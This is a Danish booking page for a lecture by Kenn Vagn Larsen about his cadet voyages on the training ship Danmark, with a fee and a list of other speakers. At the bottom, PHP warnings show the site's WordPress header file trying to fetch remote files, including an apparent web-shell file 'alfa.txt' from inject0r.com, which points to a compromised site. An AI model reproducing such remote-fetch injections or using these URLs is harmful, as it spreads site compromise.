img-us
  • asc

    Foredragsholder Kenn Vagn Larsen

  • asc

    Emne Skole Skibet Danmark. En oplevelse for livet

  • asc

    pris 5000.-

Som gammel skoleskibs dreng, nu i en alder af 52, sidder mine oplevelser stadigvæk , som var det i går. Jeg tilbragte 2 togter (2x5 måneder) ombord, som kadet, hvilket var med til at lægge grunden, til det menneske jeg er i dag.


Jeg har indtil flere udd. bag mig, og et til tider liv, med en masse af udfordringer. Men jeg har aldrig kendt ordene, at give op. Og det ikke mindst i kraft af min tid ombord på Skole Skibet Danmark. Jeg plejer at sige, det var verdens bedste samarbejde/overlevelses kursus.


Beskrivelse og udbytte af foredrag

I mit foredrag fortæller jeg hvordan livet, var ombord i en tid , før det gode skib, blev bygget om, som det står i dag. Jeg kommer omkring vindstød på op til 55 km/s, ingen livliner samt fejring af den amerikanske Coast Guard´s 100 års jubilærum. At være 23 dage til søs i træk over atlanten og om kammeratskab, på godt og ondt. Personlige oplevelser med små sømands historier , om alt det der også foregik, når officererne ikke, så med. Og med en lærdom gennem resten af livet med ordene aldrig at give op !


SHARE THIS:

Share: 0

Send en forespørgsel på et
foredrag

Andre foredragsholdere

Joakim Seidler

Joseph Berg Bolding

Anna Maria Kølner-Augustson

Amalie Pedersen


Warning: file_get_contents(https://inject0r.com/wp-content/uploads/2020/10/alfa.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 410 Gone in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22

Warning: file_get_contents(https://ziarroman.ro/wp-content/uploads/2021/04/ads.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22